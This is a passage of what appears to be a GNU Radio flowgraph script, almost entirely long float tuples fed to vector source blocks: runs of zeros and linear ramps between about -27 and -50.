0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.
0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.
0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,-27.0,-27.0,-27.1,-27.1,-27.2,-27.2,-27.3,-27.3,-27.3,-27.4,-27.4,-27.5,-27.5,-27.5,-27.6,-27.6,-27.7,-27.7,-27.8,-27.8,-27.8,-27.9,-27.9,-28.0,-28.0,-28.0,-28.1,-28.1,-28.2,-28.2,-28.3,-28.3,-28.3,-28.4,-28.4,-28.5,-28.5,-28.6,-28.6,-28.6,-28.7,-28.7,-28.8,-28.8,-28.8,-28.9,-28.9,-29.0,-29.0,-29.1,-29.1,-29.1,-29.2,-29.2,-29.3,-29.3,-29.3,-29.4,-29.4,-29.5,-29.5,-29.6,-29.6,-29.6,-29.7,-29.7,-29.8,-29.8,-29.8,-29.9,-29.9,-30.0,-30.0,-30.1,-30.1,-30.1,-30.2,-30.2,-30.3,-30.3,-30.4,-30.4,-30.4,-30.5,-30.5,-30.6,-30.6,-30.6,-30.7,-30.7,-30.8,-30.8,-30.9,-30.9,-30.9,-31.0,-31.0,-31.1,-31.1,-31.1,-31.2,-31.2,-31.3,-31.3,-31.4,-31.4,-31.4,-31.5,-31.5,-31.
6,-31.6,-31.7,-31.7,-31.7,-31.8,-31.8,-31.9,-31.9,-31.9,-32.0,-32.0,-32.1,-32.1,-32.2,-32.2,-32.2,-32.3,-32.3,-32.4,-32.4,-32.4,-32.5,-32.5,-32.6,-32.6,-32.7,-32.7,-32.7,-32.8,-32.8,-32.9,-32.9,-32.9,-33.0,-33.0,-33.1,-33.1,-33.2,-33.2,-33.2,-33.3,-33.3,-33.4,-33.4,-33.5,-33.5,-33.5,-33.6,-33.6,-33.7,-33.7,-33.7,-33.8,-33.8,-33.9,-33.9,-34.0,-34.0,-34.0,-34.1,-34.1,-34.2,-34.2,-34.2,-34.3,-34.3,-34.4,-34.4,-34.5,-34.5,-34.5,-34.6,-34.6,-34.7,-34.7,-34.8,-34.8,-34.8,-34.9,-34.9,-35.0,-35.0,-35.0,-35.1,-35.1,-35.2,-35.2,-35.3,-35.3,-35.3,-35.4,-35.4,-35.5,-35.5,-35.5,-35.6,-35.6,-35.7,-35.7,-35.8,-35.8,-35.8,-35.9,-35.9,-36.0,-36.0,-36.0,-36.1,-36.1,-36.2,-36.2,-36.3,-36.3,-36.3,-36.4,-36.4,-36.5,-36.5,-36.6,-36.6,-36.6,-36.7,-36.7,-36.8,-36.8,-36.8,-36.9,-36.9,-37.0,-37.0,-37.1,-37.1,-37.1,-37.2,-37.2,-37.3,-37.3,-37.3,-37.4,-37.4,-37.5,-37.5,-37.6,-37.6,-37.6,-37.7,-37.7,-37.8,-37.8,-37.9,-37.9,-37.9,-38.0,-38.0,-38.1,-38.1,-38.1,-38.2,-38.2,-38.3,-38.3,-38.4,-38.4,-38.4,-38.5,-38.5,-38.6,-38.6,-38.6,-38.7,-38.7,-38.8,-38.8,-38.9,-38.9,-38.9,-39.0,-39.0,-39.1,-39.1,-39.1,-39.2,-39.2,-39.3,-39.3,-39.4,-39.4,-39.4,-39.5,-39.5,-39.6,-39.6,-39.7,-39.7,-39.7,-39.8,-39.8,-39.9,-39.9,-39.9,-40.0,-40.0,-40.1,-40.1,-40.2,-40.2,-40.2,-40.3,-40.3,-40.4,-40.4,-40.4,-40.5,-40.5,-40.6,-40.6,-40.7,-40.7,-40.7,-40.8,-40.8,-40.9,-40.9,-41.0,-41.0,-41.0,-41.1,-41.1,-41.2,-41.2,-41.2,-41.3,-41.3,-41.4,-41.4,-41.5,-41.5,-41.5,-41.6,-41.6,-41.7,-41.7,-41.7,-41.8,-41.8,-41.9,-41.9,-42.0,-42.0,-42.0,-42.1,-42.1,-42.2,-42.2,-42.2,-42.3,-42.3,-42.4,-42.4,-42.5,-42.5,-42.5,-42.6,-42.6,-42.7,-42.7,-42.8,-42.8,-42.8,-42.9,-42.9,-43.0,-43.0,-43.0,-43.1,-43.1,-43.2,-43.2,-43.3,-43.3,-43.3,-43.4,-43.4,-43.5,-43.5,-43.5,-43.6,-43.6,-43.7,-43.7,-43.8,-43.8,-43.8,-43.9,-43.9,-44.0,-44.0,-44.1,-44.1,-44.1,-44.2,-44.2,-44.3,-44.3,-44.3,-44.4,-44.4,-44.5,-44.5,-44.6,-44.6,-44.6,-44.7,-44.7,-44.8,-44.8,-44.8,-44.9,-44.9,-45.0,-45.0,-45.1,-45.1,-45.1,-45.2,-45.2,-45.3,-45.3,-45.3,-45.4,-45.4,-45.5,-45.5,
-45.6,-45.6,-45.6,-45.7,-45.7,-45.8,-45.8,-45.9,-45.9,-45.9,-46.0,-46.0,-46.1,-46.1,-46.1,-46.2,-46.2,-46.3,-46.3,-46.4,-46.4,-46.4,-46.5,-46.5,-46.6,-46.6,-46.6,-46.7,-46.7,-46.8,-46.8,-46.9,-46.9,-46.9,-47.0,-47.0,-47.1,-47.1,-47.2,-47.2,-47.2,-47.3,-47.3,-47.4,-47.4,-47.4,-47.5,-47.5,-47.6,-47.6,-47.7,-47.7,-47.7,-47.8,-47.8,-47.9,-47.9,-47.9,-48.0,-48.0,-48.1,-48.1,-48.2,-48.2,-48.2,-48.3,-48.3,-48.4,-48.4,-48.4,-48.5,-48.5,-48.6,-48.6,-48.7,-48.7,-48.7,-48.8,-48.8,-48.9,-48.9,-49.0,-49.0,-49.0,-49.1,-49.1,-49.2,-49.2,-49.2,-49.3,-49.3,-49.4,-49.4,-49.5,-49.5,-49.5,-49.6,-49.6,-49.7,-49.7,-49.7,-49.8,-49.8,-49.9,-49.9,-50.0,-50.0), True, 1, [])
self.blocks_vector_source_x_0 = blocks.vector_source_f((-45.0,-45.0,-44.9,-44.9,-44.9,-44.8,-44.8,-44.8,-44.7,-44.7,-44.7,-44.6,-44.6,-44.6,-44.5,-44.5,-44.5,-44.4,-44.4,-44.4,-44.3,-44.3,-44.3,-44.2,-44.2,-44.2,-44.1,-44.1,-44.1,-44.0,-44.0,-44.0,-44.0,-43.9,-43.9,-43.9,-43.8,-43.8,-43.8,-43.7,-43.7,-43.7,-43.6,-43.6,-43.6,-43.5,-43.5,-43.5,-43.4,-43.4,-43.4,-43.3,-43.3,-43.3,-43.2,-43.2,-43.2,-43.1,-43.1,-43.1,-43.0,-43.0,-43.0,-42.9,-42.9,-42.9,-42.8,-42.8,-42.8,-42.7,-42.7,-42.7,-42.6,-42.6,-42.6,-42.5,-42.5,-42.5,-42.4,-42.4,-42.4,-42.3,-42.3,-42.3,-42.2,-42.2,-42.2,-42.1,-42.1,-42.1,-42.0,-42.0,-42.0,-42.0,-41.9,-41.9,-41.9,-41.8,-41.8,-41.8,-41.7,-41.7,-41.7,-41.6,-41.6,-41.6,-41.5,-41.5,-41.5,-41.4,-41.4,-41.4,-41.3,-41.3,-41.3,-41.2,-41.2,-41.2,-41.1,-41.1,-41.1,-41.0,-41.0,-41.0,-40.9,-40.9,-40.9,-40.8,-40.8,-40.8,-40.7,-40.7,-40.7,-40.6,-40.6,-40.6,-40.5,-40.5,-40.5,-40.4,-40.4,-40.4,-40.3,-40.3,-40.3,-40.2,-40.2,-40.2,-40.1,-40.1,-40.1,-40.0,-40.0,-40.0,-40.0,-39.9,-39.9,-39.9,-39.8,-39.8,-39.8,-39.7,-39.7,-39.7,-39.6,-39.6,-39.6,-39.5,-39.5,-39.5,-39.4,-39.4,-39.4,-39.3,-39.3,-39.3,-39.2,-39.2,-39.2,-39.1,-39.1,-39.1,-39.0,-39.0,-39.0,-38.9,-38.9,-38.9,-38.8,-38.8,-38.8,-38.7,-38.7,-38.7,-38.6,-38.6,-38.6,-38.5,-38.5,-38.5,-38.4,-38.4,-38.4,-38.3,-38.3,-38.3,-38.2,-38.2,-38.2,-38.1,-38.1,-38.1,-38.0,-38.0,-38.0,-38.0,-37.9,-37.9,-37.9,-37.8,-37.8,-37.8,-37.7,-37.7,-37.7,-37.6,-37.6,-37.6,-37.5,-37.5,-37.5,-37.4,-37.4,-37.4,-37.3,-37.3,-37.3,-37.2,-37.2,-37.2,-37.1,-37.1,-37.1,-37.0,-37.0,-37.0,-36.9,-36.9,-36.9,-36.8,-36.8,-36.8,-36.7,-36.7,-36.7,-36.6,-36.6,-36.6,-36.5,-36.5,-36.5,-36.4,-36.4,-36.4,-36.3,-36.3,-36.3,-36.2,-36.2,-36.2,-36.1,-36.1,-36.1,-36.0,-36.0,-36.0,-36.0,-35.9,-35.9,-35.9,-35.8,-35.8,-35.8,-35.7,-35.7,-35.7,-35.6,-35.6,-35.6,-35.5,-35.5,-35.5,-35.4,-35.4,-35.4,-35.3,-35.3,-35.3,-35.2,-35.2,-35.2,-35.1,-35.1,-35.1,-35.0,-35.0,-35.0,-34.9,-34.9,-34.9,-34.8,-34.8,-34.8,-34.7,-34.7,-34.7,-34.6,-34.6,-34.6,-34.5,-34.5,-34.5,-34.4,-34.4,
-34.4,-34.3,-34.3,-34.3,-34.2,-34.2,-34.2,-34.1,-34.1,-34.1,-34.0,-34.0,-34.0,-34.0,-33.9,-33.9,-33.9,-33.8,-33.8,-33.8,-33.7,-33.7,-33.7,-33.6,-33.6,-33.6,-33.5,-33.5,-33.5,-33.4,-33.4,-33.4,-33.3,-33.3,-33.3,-33.2,-33.2,-33.2,-33.1,-33.1,-33.1,-33.0,-33.0,-33.0,-32.9,-32.9,-32.9,-32.8,-32.8,-32.8,-32.7,-32.7,-32.7,-32.6,-32.6,-32.6,-32.5,-32.5,-32.5,-32.4,-32.4,-32.4,-32.3,-32.3,-32.3,-32.2,-32.2,-32.2,-32.1,-32.1,-32.1,-32.0,-32.0,-32.0,-32.0,-31.9,-31.9,-31.9,-31.8,-31.8,-31.8,-31.7,-31.7,-31.7,-31.6,-31.6,-31.6,-31.5,-31.5,-31.5,-31.4,-31.4,-31.4,-31.3,-31.3,-31.3,-31.2,-31.2,-31.2,-31.1,-31.1,-31.1,-31.0,-31.0,-31.0,-30.9,-30.9,-30.9,-30.8,-30.8,-30.8,-30.7,-30.7,-30.7,-30.6,-30.6,-30.6,-30.5,-30.5,-30.5,-30.4,-30.4,-30.4,-30.3,-30.3,-30.3,-30.2,-30.2,-30.2,-30.1,-30.1,-30.1,-30.0,-30.0,-30.0,-30.0,-29.9,-29.9,-29.9,-29.8,-29.8,-29.8,-29.7,-29.7,-29.7,-29.6,-29.6,-29.6,-29.5,-29.5,-29.5,-29.4,-29.4,-29.4,-29.3,-29.3,-29.3,-29.2,-29.2,-29.2,-29.1,-29.1,-29.1,-29.0,-29.0,-29.0,-28.9,-28.9,-28.9,-28.8,-28.8,-28.8,-28.7,-28.7,-28.7,-28.6,-28.6,-28.6,-28.5,-28.5,-28.5,-28.4,-28.4,-28.4,-28.3,-28.3,-28.3,-28.2,-28.2,-28.2,-28.1,-28.1,-28.1,-28.0,-28.0,-28.0,-28.0,-27.9,-27.9,-27.9,-27.8,-27.8,-27.8,-27.7,-27.7,-27.7,-27.6,-27.6,-27.6,-27.5,-27.5,-27.5,-27.4,-27.4,-27.4,-27.3,-27.3,-27.3,-27.2,-27.2,-27.2,-27.1,-27.1,-27.1,-27.0,-27.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,
0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,
0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,